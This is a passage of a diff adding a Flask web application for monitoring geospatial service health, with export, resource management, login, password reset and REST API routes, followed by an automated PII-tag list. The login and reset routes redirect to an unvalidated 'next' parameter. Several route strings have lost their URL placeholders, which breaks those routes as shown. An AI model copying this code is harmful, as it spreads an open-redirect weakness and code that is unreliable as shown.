+        for r in response['resources']:
+            try:
+                ghc_url = '%s%s' % (CONFIG['GHC_SITE_URL'],
+                                    url_for('get_resource_by_id',
+                                            identifier=r.identifier))
+
+                writer.writerow([
+                    r.resource_type,
+                    r.title,
+                    r.url,
+                    ghc_url,
+                    '%s/json' % ghc_url,
+                    '%s/csv' % ghc_url,
+                    format_checked_datetime(r.first_run),
+                    format_checked_datetime(r.last_run),
+                    format_run_status(r.last_run),
+                    round(r.min_response_time, 2),
+                    round(r.average_response_time, 2),
+                    round(r.max_response_time, 2),
+                    round(r.reliability, 2)
+                ])
+            except Exception as e:
+                LOGGER.warning(
+                    'CSV error resource id=%d: %s' % (r.identifier, str(e)))
+
+        return output.getvalue(), 200, {'Content-type': 'text/csv'}
+
+
+@APP.route('/opensearch')
+def opensearch():
+    """"""generate OpenSearch description document""""""
+
+    content = render_template('opensearch_description.xml')
+
+    return content, 200, {'Content-type': 'text/xml'}
+
+
+@APP.route('/resource/<identifier>/csv', endpoint='csv-resource')
+@APP.route('/resource/<identifier>/json', endpoint='json-resource')
+def export_resource(identifier):
+    """"""export resource as JSON or CSV""""""
+
+    resource = views.get_resource_by_id(identifier)
+
+    history_csv = '%s/resource/%s/history/csv' % (CONFIG['GHC_SITE_URL'],
+                                                  resource.identifier)
+    history_json = '%s/resource/%s/history/json' % (CONFIG['GHC_SITE_URL'],
+                                                    resource.identifier)
+    if 'json' in request.url_rule.rule:
+        last_run_report = '-'
+        if resource.last_run:
+            last_run_report = resource.last_run.report
+
+        json_dict = {
+            'identifier': resource.identifier,
+            'title': resource.title,
+            'url': resource.url,
+            'resource_type': resource.resource_type,
+            'owner': resource.owner.username,
+            'min_response_time': resource.min_response_time,
+            'average_response_time': resource.average_response_time,
+            'max_response_time': resource.max_response_time,
+            'reliability': resource.reliability,
+            'status': format_run_status(resource.last_run),
+            'first_run': format_checked_datetime(resource.first_run),
+            'last_run': format_checked_datetime(resource.last_run),
+            'history_csv': history_csv,
+            'history_json': history_json,
+            'last_report': format_obj_value(last_run_report)
+        }
+        return jsonify(json_dict)
+    elif 'csv' in request.url_rule.rule:
+        output = StringIO()
+        writer = csv.writer(output)
+        header = [
+            'identifier', 'title', 'url', 'resource_type', 'owner',
+            'min_response_time', 'average_response_time', 'max_response_time',
+            'reliability', 'status', 'first_run', 'last_run', 'history_csv',
+            'history_json'
+        ]
+
+        writer.writerow(header)
+        writer.writerow([
+            resource.identifier,
+            resource.title,
+            resource.url,
+            resource.resource_type,
+            resource.owner.username,
+            resource.min_response_time,
+            resource.average_response_time,
+            resource.max_response_time,
+            resource.reliability,
+            format_run_status(resource.last_run),
+            format_checked_datetime(resource.first_run),
+            format_checked_datetime(resource.last_run),
+            history_csv,
+            history_json
+        ])
+        return output.getvalue(), 200, {'Content-type': 'text/csv'}
+
+
+@APP.route('/resource/<identifier>/history/csv',
+           endpoint='csv-resource-history')
+@APP.route('/resource/<identifier>/history/json',
+           endpoint='json-resource-history')
+def export_resource_history(identifier):
+    """"""export resource history as JSON or CSV""""""
+
+    resource = views.get_resource_by_id(identifier)
+
+    if 'json' in request.url_rule.rule:
+        json_dict = {'runs': []}
+
+        for run in resource.runs:
+            json_dict['runs'].append({
+                'owner': resource.owner.username,
+                'resource_type': resource.resource_type,
+                'checked_datetime': format_checked_datetime(run),
+                'title': resource.title,
+                'url': resource.url,
+                'response_time': round(run.response_time, 2),
+                'status': format_run_status(run)
+            })
+        return jsonify(json_dict)
+    elif 'csv' in request.url_rule.rule:
+        output = StringIO()
+        writer = csv.writer(output)
+        header = [
+            'owner', 'resource_type', 'checked_datetime', 'title', 'url',
+            'response_time', 'status'
+        ]
+        writer.writerow(header)
+        for run in resource.runs:
+            writer.writerow([
+                resource.owner.username,
+                resource.resource_type,
+                format_checked_datetime(run),
+                resource.title,
+                resource.url,
+                round(run.response_time, 2),
+                format_run_status(run),
+            ])
+        return output.getvalue(), 200, {'Content-type': 'text/csv'}
+
+
+@APP.route('/settings')
+def settings():
+    """"""settings""""""
+    pass
+
+
+@APP.route('/resources')
+def resources():
+    """"""lists resources with optional filter""""""
+
+    resource_type = None
+
+    if request.args.get('resource_type') in RESOURCE_TYPES.keys():
+        resource_type = request.args['resource_type']
+
+    tag = request.args.get('tag')
+
+    query = request.args.get('q')
+
+    response = views.list_resources(resource_type, query, tag)
+    return render_template('resources.html', response=response)
+
+
+@APP.route('/resource/<identifier>')
+def get_resource_by_id(identifier):
+    """"""show resource""""""
+
+    response = views.get_resource_by_id(identifier)
+    return render_template('resource.html', resource=response)
+
+
+@APP.route('/register', methods=['GET', 'POST'])
+def register():
+    """"""register a new user""""""
+    if not CONFIG['GHC_SELF_REGISTER']:
+        msg1 = gettext('This site is not configured for self-registration')
+        msg2 = gettext('Please contact')
+        msg = '%s. %s %s' % (msg1, msg2,
+                             CONFIG['GHC_ADMIN_EMAIL'])
+        flash('%s' % msg, 'danger')
+        return render_template('register.html', errmsg=msg)
+    if request.method == 'GET':
+        return render_template('register.html')
+
+    # Check for existing user or email
+    user = User.query.filter_by(username=request.form['username']).first()
+    email = User.query.filter_by(email=request.form['email']).first()
+    if user or email:
+        flash('%s' % gettext('Invalid username or email'), 'danger')
+        return render_template('register.html')
+
+    user = User(request.form['username'],
+                request.form['password'], request.form['email'])
+
+    DB.session.add(user)
+    try:
+        DB.session.commit()
+    except Exception as err:
+        DB.session.rollback()
+        # err.message is gone in Python 3; str(err) works for both
+        bad_column = str(err).split()[2]
+        bad_value = request.form[bad_column]
+        msg = gettext('already registered')
+        flash('%s %s %s' % (bad_column, bad_value, msg), 'danger')
+        return redirect(url_for('register', lang=g.current_lang))
+    return redirect(url_for('login', lang=g.current_lang))
+
+
+@APP.route('/add', methods=['GET', 'POST'])
+@login_required
+def add():
+    """"""add resource""""""
+    if not g.user.is_authenticated():
+        return render_template('add.html')
+    if request.method == 'GET':
+        return render_template('add.html')
+    resource_type = request.form['resource_type']
+    tags = request.form.getlist('tags')
+    url = request.form['url'].strip()
+    resources_to_add = []
+
+    from healthcheck import sniff_test_resource, run_test_resource
+    sniffed_resources = sniff_test_resource(CONFIG, resource_type, url)
+
+    if not sniffed_resources:
+        msg = gettext(""No resources detected"")
+        # LOGGER.exception() requires a message and an active exception;
+        # a plain warning is what is intended here
+        LOGGER.warning(msg)
+        flash(msg, 'danger')
+
+    for (resource_type, resource_url,
+         title, success, response_time,
+         message, start_time, resource_tags,) in sniffed_resources:
+
+        tags_to_add = []
+        for tag in chain(tags, resource_tags):
+            tag_obj = tag
+            if not isinstance(tag, Tag):
+                tag_obj = Tag.query.filter_by(name=tag).first()
+                if tag_obj is None:
+                    tag_obj = Tag(name=tag)
+            tags_to_add.append(tag_obj)
+
+        resource_to_add = Resource(current_user,
+                                   resource_type,
+                                   title,
+                                   resource_url,
+                                   tags=tags_to_add)
+
+        resources_to_add.append(resource_to_add)
+        probe_to_add = None
+        checks_to_add = []
+
+        # Always add a default Probe and Check(s)
+        # from the GHC_PROBE_DEFAULTS conf
+        if resource_type in CONFIG['GHC_PROBE_DEFAULTS']:
+            resource_settings = CONFIG['GHC_PROBE_DEFAULTS'][resource_type]
+            probe_class = resource_settings['probe_class']
+            if probe_class:
+                # Add the default Probe
+                probe_obj = Factory.create_obj(probe_class)
+                probe_to_add = ProbeVars(
+                    resource_to_add, probe_class,
+                    probe_obj.get_default_parameter_values())
+
+                # Add optional default (parameterized)
+                # Checks to add to this Probe
+                checks_info = probe_obj.get_checks_info()
+                checks_param_info = probe_obj.get_plugin_vars()['CHECKS_AVAIL']
+                for check_class in checks_info:
+                    check_param_info = checks_param_info[check_class]
+                    if 'default' in checks_info[check_class]:
+                        if checks_info[check_class]['default']:
+                            # Filter out params for Check with fixed values
+                            param_defs = check_param_info['PARAM_DEFS']
+                            param_vals = {}
+                            for param in param_defs:
+                                if param_defs[param]['value']:
+                                    param_vals[param] = \
+                                        param_defs[param]['value']
+                            check_vars = CheckVars(
+                                probe_to_add, check_class, param_vals)
+                            checks_to_add.append(check_vars)
+
+        result = run_test_resource(resource_to_add)
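+        # (Editor's note, hedged: run_test_resource() from the healthcheck
+        # module appears to execute the new Resource's Probes once,
+        # synchronously; wrapping the outcome in a Run below gives the
+        # Resource an initial status and response time right away.)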
run_to_add = Run(resource_to_add, result) + + DB.session.add(resource_to_add) + # prepopulate notifications for current user + resource_to_add.set_recipients('email', [g.user.email]) + + if probe_to_add: + DB.session.add(probe_to_add) + for check_to_add in checks_to_add: + DB.session.add(check_to_add) + DB.session.add(run_to_add) + + try: + DB.session.commit() + msg = gettext('Services registered') + flash('%s (%s, %s)' % (msg, resource_type, url), 'success') + except Exception as err: + DB.session.rollback() + flash(str(err), 'danger') + return redirect(url_for('home', lang=g.current_lang)) + + if len(resources_to_add) == 1: + return edit_resource(resources_to_add[0].identifier) + return redirect(url_for('home', lang=g.current_lang)) + + +@APP.route('/resource/<resource_identifier>/update', methods=['POST']) +@login_required +def update(resource_identifier): + """"""update a resource"""""" + + update_counter = 0 + status = 'success' + + try: + resource_identifier_dict = request.get_json() + + resource = Resource.query.filter_by( + identifier=resource_identifier).first() + + for key, value in resource_identifier_dict.items(): + if key == 'tags': + resource_tags = [t.name for t in resource.tags] + + tags_to_add = set(value) - set(resource_tags) + tags_to_delete = set(resource_tags) - set(value) + + # Existing Tags: create relation else add new Tag + all_tag_objs = Tag.query.all() + for tag in tags_to_add: + tag_add_obj = None + for tag_obj in all_tag_objs: + if tag == tag_obj.name: + # use existing + tag_add_obj = tag_obj + break + + if not tag_add_obj: + # add new + tag_add_obj = Tag(name=tag) + DB.session.add(tag_add_obj) + + resource.tags.append(tag_add_obj) + + for tag in tags_to_delete: + tag_to_delete = Tag.query.filter_by(name=tag).first() + resource.tags.remove(tag_to_delete) + + update_counter += 1 + elif key == 'probes': + # Remove all existing ProbeVars for Resource + # (iterate over a copy: removing from the live relationship + # while looping over it would skip entries) + for probe_var in list(resource.probe_vars): + resource.probe_vars.remove(probe_var) + + # Add ProbeVars anew each with optional CheckVars + for probe in value: + LOGGER.info('adding Probe class=%s parms=%s' % + (probe['probe_class'], str(probe))) + probe_vars = ProbeVars(resource, probe['probe_class'], + probe['parameters']) + for check in probe['checks']: + check_vars = CheckVars( + probe_vars, check['check_class'], + check['parameters']) + probe_vars.check_vars.append(check_vars) + + resource.probe_vars.append(probe_vars) + + update_counter += 1 + elif key == 'notify_emails': + resource.set_recipients('email', + [v for v in value if v.strip()]) + elif key == 'notify_webhooks': + resource.set_recipients('webhook', + [v for v in value if v.strip()]) + elif key == 'auth': + resource.auth = value + elif getattr(resource, key) != resource_identifier_dict[key]: + # Update other resource attrs, mainly 'name' + setattr(resource, key, resource_identifier_dict[key]) + min_run_freq = CONFIG['GHC_MINIMAL_RUN_FREQUENCY_MINS'] + if int(resource.run_frequency) < min_run_freq: + resource.run_frequency = min_run_freq + update_counter += 1 + + # Always update geo-IP: maybe failure on creation or + # IP-address of URL may have changed. 
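+ # geocode() returns (0.0, 0.0) when the lookup fails, so the check + # below keeps the previous coordinates in that case.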
+ latitude, longitude = geocode(resource.url) + if latitude != 0.0 and longitude != 0.0: + # Only update for valid lat/lon + resource.latitude = latitude + resource.longitude = longitude + update_counter += 1 + + except Exception as err: + LOGGER.error(""Cannot update resource: %s"", err, exc_info=err) + DB.session.rollback() + status = str(err) + update_counter = 0 + # finally: + # DB.session.close() + + if update_counter > 0: + err = db_commit() + if err: + status = str(err) + + return jsonify({'status': status}) + + +@APP.route('/resource/<resource_identifier>/test', methods=['GET', 'POST']) +@login_required +def test(resource_identifier): + """"""test a resource"""""" + resource = Resource.query.filter_by(identifier=resource_identifier).first() + if resource is None: + flash(gettext('Resource not found'), 'danger') + return redirect(request.referrer) + + from healthcheck import run_test_resource + result = run_test_resource( + resource) + + if request.method == 'GET': + if result.message == 'Skipped': + msg = gettext('INFO') + flash('%s: %s' % (msg, result.message), 'info') + elif result.message not in ['OK', None, 'None']: + msg = gettext('ERROR') + flash('%s: %s' % (msg, result.message), 'danger') + else: + flash(gettext('Resource tested successfully'), 'success') + + return redirect(url_for('get_resource_by_id', lang=g.current_lang, + identifier=resource_identifier)) + elif request.method == 'POST': + return jsonify(result.get_report()) + + +@APP.route('/resource/<resource_identifier>/edit') +@login_required +def edit_resource(resource_identifier): + """"""edit a resource"""""" + resource = Resource.query.filter_by(identifier=resource_identifier).first() + if resource is None: + flash(gettext('Resource not found'), 'danger') + return redirect(request.referrer) + + probes_avail = views.get_probes_avail(resource.resource_type, resource) + + suggestions = json.dumps(Recipient.get_suggestions('email', + g.user.username)) + + return render_template('edit_resource.html', + lang=g.current_lang, + resource=resource, + suggestions=suggestions, + auths_avail=ResourceAuth.get_auth_defs(), + probes_avail=probes_avail) + + +@APP.route('/resource/<resource_identifier>/delete') +@login_required +def delete(resource_identifier): + """"""delete a resource"""""" + resource = Resource.query.filter_by(identifier=resource_identifier).first() + # check existence before touching resource.owner below + if resource is None: + flash(gettext('Resource not found'), 'danger') + return redirect(url_for('home', lang=g.current_lang)) + + if g.user.role != 'admin' and g.user.username != resource.owner.username: + msg = gettext('You do not have access to delete this resource') + flash(msg, 'danger') + return redirect(url_for('get_resource_by_id', lang=g.current_lang, + identifier=resource_identifier)) + + resource.clear_recipients() + DB.session.delete(resource) + + try: + DB.session.commit() + flash(gettext('Resource deleted'), 'success') + return redirect(url_for('home', lang=g.current_lang)) + except Exception as err: + DB.session.rollback() + flash(str(err), 'danger') + return redirect(request.referrer) + + +@APP.route('/probe/<probe_class>/<resource_identifier>/edit_form') +@APP.route('/probe/<probe_class>/edit_form') +@login_required +def get_probe_edit_form(probe_class, resource_identifier=None): + """"""get the form to edit a Probe"""""" + + probe_obj = Factory.create_obj(probe_class) + if resource_identifier: + resource = views.get_resource_by_id(resource_identifier) + if resource: + probe_obj._resource = resource + probe_obj.expand_params(resource) + + probe_info = probe_obj.get_plugin_vars() + probe_vars = ProbeVars( + None, probe_class, 
probe_obj.get_default_parameter_values()) + + # Get only the default Checks for this Probe class + checks_avail = probe_obj.get_checks_info_defaults() + checks_avail = probe_obj.expand_check_vars(checks_avail) + + for check_class in checks_avail: + check_obj = Factory.create_obj(check_class) + check_params = check_obj.get_default_parameter_values() + probe_check_param_defs = \ + probe_info['CHECKS_AVAIL'][check_class]['PARAM_DEFS'] + for param in probe_check_param_defs: + if 'value' in probe_check_param_defs[param]: + check_params[param] = probe_check_param_defs[param]['value'] + + # Appends 'check_vars' to 'probe_vars' (SQLAlchemy) + CheckVars(probe_vars, check_class, check_params) + + return render_template('includes/probe_edit_form.html', + lang=g.current_lang, + probe=probe_vars, probe_info=probe_info) + + +@APP.route('/check/<check_class>/edit_form') +@login_required +def get_check_edit_form(check_class): + """"""get the form to edit a Check"""""" + + check_obj = Factory.create_obj(check_class) + check_info = check_obj.get_plugin_vars() + check_vars = CheckVars( + None, check_class, check_obj.get_default_parameter_values()) + + return render_template('includes/check_edit_form.html', + lang=g.current_lang, + check=check_vars, check_info=check_info) + + +@APP.route('/login', methods=['GET', 'POST']) +@public_route +def login(): + """"""login"""""" + if request.method == 'GET': + return render_template('login.html') + username = request.form['username'] + password = request.form['password'] + registered_user = User.query.filter_by(username=username).first() + authenticated = False + if registered_user: + # May not have upgraded to pw encryption: warn + if len(registered_user.password) < 80: + msg = 'Please upgrade GHC to encrypted passwords first, see docs!' + flash(gettext(msg), 'danger') + return redirect(url_for('login', lang=g.current_lang)) + + try: + authenticated = registered_user.authenticate(password) + finally: + pass + + if not authenticated: + flash(gettext('Invalid username and / or password'), 'danger') + return redirect(url_for('login', lang=g.current_lang)) + + # Login ok + login_user(registered_user) + + if 'next' in request.args: + return redirect(request.args.get('next')) + return redirect(url_for('home', lang=g.current_lang)) + + +@APP.route('/logout') +def logout(): + """"""logout"""""" + logout_user() + flash(gettext('Logged out'), 'success') + if request.referrer: + return redirect(request.referrer) + else: + return redirect(url_for('home', lang=g.current_lang)) + + +@APP.route('/reset_req', methods=['GET', 'POST']) +@public_route +def reset_req(): + """""" + Reset password request handling. 
+ """""" + if request.method == 'GET': + return render_template('reset_password_request.html') + + # Reset request form with email + email = request.form['email'] + registered_user = User.query.filter_by(email=email).first() + if registered_user is None: + LOGGER.warn('Invalid email for reset_req: %s' % email) + flash(gettext('Invalid email'), 'danger') + return redirect(url_for('reset_req', lang=g.current_lang)) + + # Generate reset url using user-specific token + token = registered_user.get_token() + reset_url = '%s/reset/%s' % (CONFIG['GHC_SITE_URL'], token) + + # Create message body with reset link + msg_body = render_template('reset_password_email.txt', + lang=g.current_lang, config=CONFIG, + reset_url=reset_url, + username=registered_user.username) + + try: + from email.mime.text import MIMEText + from email.utils import formataddr + msg = MIMEText(msg_body, 'plain', 'utf-8') + msg['From'] = formataddr((CONFIG['GHC_SITE_TITLE'], + CONFIG['GHC_ADMIN_EMAIL'])) + msg['To'] = registered_user.email + msg['Subject'] = '[%s] %s' % (CONFIG['GHC_SITE_TITLE'], + gettext('reset password')) + + from_addr = '%s <%s>' % (CONFIG['GHC_SITE_TITLE'], + CONFIG['GHC_ADMIN_EMAIL']) + + to_addr = registered_user.email + + msg_text = msg.as_string() + send_email(CONFIG['GHC_SMTP'], from_addr, to_addr, msg_text) + except Exception as err: + msg = 'Cannot send email. Contact admin: ' + LOGGER.warn(msg + ' err=' + str(err)) + flash(gettext(msg) + CONFIG['GHC_ADMIN_EMAIL'], 'danger') + return redirect(url_for('login', lang=g.current_lang)) + + flash(gettext('Password reset link sent via email'), 'success') + + if 'next' in request.args: + return redirect(request.args.get('next')) + return redirect(url_for('home', lang=g.current_lang)) + + +@APP.route('/reset/', methods=['GET', 'POST']) +@public_route +def reset(token=None): + """""" + Reset password submit form handling. + """""" + + # Must have at least a token to proceed. + if token is None: + return redirect(url_for('reset_req', lang=g.current_lang)) + + # Token received: verify if ok, may also time-out. + registered_user = User.verify_token(token) + if registered_user is None: + LOGGER.warn('Cannot find User from token: %s' % token) + flash(gettext('Invalid token'), 'danger') + return redirect(url_for('login', lang=g.current_lang)) + + # Token and user ok: return reset form. + if request.method == 'GET': + return render_template('reset_password_form.html') + + # Valid token and user: change password from form-value + password = request.form['password'] + if not password: + flash(gettext('Password required'), 'danger') + return redirect(url_for('reset/%s' % token, lang=g.current_lang)) + registered_user.set_password(password) + DB.session.add(registered_user) + + try: + DB.session.commit() + flash(gettext('Update password OK'), 'success') + except Exception as err: + msg = 'Update password failed!' + LOGGER.warn(msg + ' err=' + str(err)) + DB.session.rollback() + flash(gettext(msg), 'danger') + + # Finally redirect user to login page + return redirect(url_for('login', lang=g.current_lang)) + + +# +# REST Interface Calls +# + +@APP.route('/api/v1.0/summary') +@APP.route('/api/v1.0/summary/') +@APP.route('/api/v1.0/summary.') +def api_summary(content_type='json'): + """""" + Get health summary for all Resources within this instance. 
+ """""" + + health_summary = views.get_health_summary() + + # Convert Runs to dict-like structure + for run in ['first_run', 'last_run']: + run_obj = health_summary.get(run, None) + if run_obj: + health_summary[run] = run_obj.for_json() + + # Convert Resources failing to dict-like structure + failed_resources = [] + for resource in health_summary['failed_resources']: + failed_resources.append(resource.for_json()) + health_summary['failed_resources'] = failed_resources + + if content_type == 'json': + result = jsonify(health_summary) + else: + result = '
    \n%s\n
    ' % \ + render_template('status_report_email.txt', + lang=g.current_lang, summary=health_summary) + return result + + +@APP.route('/api/v1.0/probes-avail/') +@APP.route('/api/v1.0/probes-avail/') +@APP.route('/api/v1.0/probes-avail//') +def api_probes_avail(resource_type=None, resource_id=None): + """""" + Get available (configured) Probes for this + installation, optional for resource type + """""" + resource = None + if resource_id: + resource = views.get_resource_by_id(resource_id) + + probes = views.get_probes_avail(resource_type=resource_type, + resource=resource) + return jsonify(probes) + + +@APP.route('/api/v1.0/runs/') +@APP.route('/api/v1.0/runs/.') +@APP.route('/api/v1.0/runs//') +@APP.route('/api/v1.0/runs//.') +def api_runs(resource_id, run_id=None, content_type='json'): + """""" + Get Runs (History of results) for Resource. + """""" + if run_id: + runs = [views.get_run_by_id(run_id)] + else: + runs = views.get_run_by_resource_id(resource_id) + + run_arr = [] + for run in runs: + run_dict = { + 'id': run.identifier, + 'success': run.success, + 'response_time': run.response_time, + 'checked_datetime': run.checked_datetime, + 'message': run.message, + 'report': run.report + } + run_arr.append(run_dict) + + runs_dict = {'total': len(run_arr), 'runs': run_arr} + result = 'unknown' + if content_type == 'json': + result = jsonify(runs_dict) + elif content_type == 'html': + result = render_template('includes/runs.html', + lang=g.current_lang, runs=runs_dict['runs']) + return result + + +if __name__ == '__main__': # run locally, for fun + import sys + + HOST = '127.0.0.1' + PORT = 8000 + if len(sys.argv) > 1: + HOST, PORT = sys.argv[1].split(':') + APP.run(host=HOST, port=int(PORT), use_reloader=True, debug=True) +",38819,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Tom Kralidis dummy@email.com'], ['PERSON', 'Just van den Broecke'], ['DATE_TIME', '2014'], ['PERSON', 'Tom Kralidis'], ['LOCATION', 'DAMAGES'], ['PERSON', 'WHETHER'], ['LOCATION', 'jsonify'], ['NRP', 'German'], ['LOCATION', 'Español'], ['LOCATION', 'Bolivia'], ['NRP', 'Croatian'], ['LOCATION', 'Croatia'], ['URL', 'request.sc'], ['URL', 'request.pa'], ['URL', 'request.sc'], ['URL', 'request.pa'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'MANAGER.re'], ['PERSON', 'TODO'], ['PERSON', 'RESOURCE_TYPES'], ['URL', 'rule.ru'], ['URL', 'r.id'], ['URL', 'r.fi'], ['URL', 'rule.ru'], ['URL', 'r.id'], ['URL', 'r.fi'], ['URL', 'r.la'], ['PERSON', ""history_csv = '""], ['URL', 'resource.id'], ['PERSON', 'history_json'], ['URL', 'resource.id'], ['PERSON', 'json'], ['URL', 'rule.ru'], ['URL', 'resource.la'], ['URL', 'resource.re'], ['URL', 'rule.ru'], ['URL', 'resource.re'], ['URL', 'resource.owner.us'], ['PERSON', 'json'], ['URL', 'rule.ru'], ['URL', 'run.re'], ['URL', 'rule.ru'], ['URL', 'run.re'], ['PERSON', ""methods=['GET""], ['LOCATION', 'msg2'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['PERSON', ""methods=['GET""], ['URL', 'request.fo'], ['LOCATION', 'chain(tags'], ['PERSON', 'checks_param_info'], ['LOCATION', 'check_class'], ['LOCATION', 'check_class'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['LOCATION', 'tag_obj'], ['PERSON', ""methods=['GET""], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['PERSON', ""gettext('You""], ['LOCATION', 
'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'resource.cl'], ['PERSON', 'DB.session.delete(resource'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'request.re'], ['URL', 'APP.ro'], ['LOCATION', 'get_probe_edit_form(probe_class'], ['PERSON', 'Factory.create_obj(check_class'], ['PERSON', 'probe_check_param_defs = \\'], ['LOCATION', 'CheckVars(probe_vars'], ['LOCATION', 'check_class'], ['LOCATION', 'lang=g.current_lang'], ['PERSON', 'check_info ='], ['LOCATION', 'check_class'], ['LOCATION', 'lang=g.current_lang'], ['PERSON', 'check_info=check_info)\n\n\n'], ['PERSON', ""methods=['GET""], ['DATE_TIME', 'May'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['PERSON', ""methods=['GET""], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['PERSON', 'lang=g.current_lang'], ['URL', 'user.us'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'request.ar'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['PERSON', ""methods=['GET""], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['PERSON', 'failed_resources.append(resource.for_json'], ['PERSON', 'lang=g.current_lang'], ['PERSON', 'lang=g.current_lang'], ['URL', 'https://flask-login.readthedocs.io'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'logging.ge'], ['URL', 'App.ge'], ['URL', 'App.ge'], ['URL', 'App.ge'], ['URL', 'App.ge'], ['URL', 'MANAGER.in'], ['URL', 'LOGGER.in'], ['URL', 'LOGGER.in'], ['URL', 'DB.session.com'], ['URL', 'DB.session.ro'], ['URL', 'DB.session.cl'], ['URL', 'APP.be'], ['URL', 'g.us'], ['URL', 'request.ar'], ['URL', 'request.ar'], ['URL', 'request.ar'], ['URL', 'g.cu'], ['URL', 'request.ar'], ['URL', 'g.cu'], ['URL', 'request.pa'], ['URL', 'request.pa'], ['URL', 'g.user.is'], ['URL', 'APP.vi'], ['URL', 'function.is'], ['URL', 'DB.session.re'], ['URL', 'g.ge'], ['URL', 'request.ac'], ['URL', 'languages.be'], ['URL', 'LANGUAGES.ke'], ['URL', 'MANAGER.us'], ['URL', 'User.query.ge'], ['URL', 'request.headers.ge'], ['URL', 'val.re'], ['URL', 'User.query.fi'], ['URL', 'user.au'], ['URL', 'APP.co'], ['URL', 'views.ge'], ['URL', 'views.ge'], ['URL', 'tags.ke'], ['URL', 'APP.ro'], ['URL', 'views.ge'], ['URL', 'home.ht'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'request.args.ge'], ['URL', 'TYPES.ke'], ['URL', 'request.ar'], ['URL', 'request.args.ge'], ['URL', 'views.li'], ['URL', 'r.la'], ['URL', 'r.la'], ['URL', 'run.re'], ['URL', 'r.re'], ['URL', 'r.la'], ['URL', 'r.la'], ['URL', 'r.ma'], ['URL', 'r.re'], ['URL', 'r.id'], ['URL', 'r.re'], ['URL', 'r.la'], ['URL', 'r.ma'], ['URL', 'r.re'], ['URL', 'r.id'], ['URL', 'output.ge'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'views.ge'], ['URL', 'resource.la'], ['URL', 'run.re'], ['URL', 'resource.id'], ['URL', 'resource.owner.us'], ['URL', 'resource.ma'], ['URL', 'resource.re'], ['URL', 'resource.la'], ['URL', 'resource.fi'], ['URL', 'resource.la'], ['URL', 'resource.id'], ['URL', 'resource.ma'], ['URL', 'resource.re'], ['URL', 'resource.la'], ['URL', 'resource.fi'], ['URL', 'resource.la'], ['URL', 'output.ge'], ['URL', 'APP.ro'], 
['URL', 'APP.ro'], ['URL', 'views.ge'], ['URL', 'resource.ru'], ['URL', 'resource.owner.us'], ['URL', 'resource.re'], ['URL', 'resource.ru'], ['URL', 'resource.owner.us'], ['URL', 'resource.re'], ['URL', 'output.ge'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'request.args.ge'], ['URL', 'TYPES.ke'], ['URL', 'request.ar'], ['URL', 'request.args.ge'], ['URL', 'request.args.ge'], ['URL', 'views.li'], ['URL', 'resources.ht'], ['URL', 'APP.ro'], ['URL', 'views.ge'], ['URL', 'resource.ht'], ['URL', 'APP.ro'], ['URL', 'register.ht'], ['URL', 'request.me'], ['URL', 'register.ht'], ['URL', 'User.query.fi'], ['URL', 'request.fo'], ['URL', 'User.query.fi'], ['URL', 'request.fo'], ['URL', 'register.ht'], ['URL', 'request.fo'], ['URL', 'request.fo'], ['URL', 'request.fo'], ['URL', 'DB.session.ad'], ['URL', 'DB.session.com'], ['URL', 'DB.session.ro'], ['URL', 'err.me'], ['URL', 'request.fo'], ['URL', 'g.user.is'], ['URL', 'add.ht'], ['URL', 'request.me'], ['URL', 'add.ht'], ['URL', 'request.fo'], ['URL', 'request.form.ge'], ['URL', 'Tag.query.fi'], ['URL', 'Factory.cr'], ['URL', 'obj.ge'], ['URL', 'obj.ge'], ['URL', 'obj.ge'], ['URL', 'DB.session.ad'], ['URL', 'add.se'], ['URL', 'g.us'], ['URL', 'DB.session.ad'], ['URL', 'DB.session.ad'], ['URL', 'DB.session.ad'], ['URL', 'DB.session.com'], ['URL', 'DB.session.ro'], ['URL', 'request.ge'], ['URL', 'Resource.query.fi'], ['URL', 'dict.it'], ['URL', 't.na'], ['URL', 'Tag.query.al'], ['URL', 'obj.na'], ['URL', 'DB.session.ad'], ['URL', 'Tag.query.fi'], ['URL', 'resource.tags.re'], ['URL', 'resource.pro'], ['URL', 'resource.pro'], ['URL', 'vars.re'], ['URL', 'LOGGER.in'], ['URL', 'vars.ch'], ['URL', 'resource.pro'], ['URL', 'resource.se'], ['URL', 'v.st'], ['URL', 'resource.se'], ['URL', 'v.st'], ['URL', 'resource.au'], ['URL', 'resource.ru'], ['URL', 'resource.ru'], ['URL', 'resource.la'], ['URL', 'LOGGER.er'], ['URL', 'DB.session.ro'], ['URL', 'DB.session.cl'], ['URL', 'APP.ro'], ['URL', 'Resource.query.fi'], ['URL', 'request.re'], ['URL', 'request.me'], ['URL', 'result.me'], ['URL', 'result.me'], ['URL', 'result.me'], ['URL', 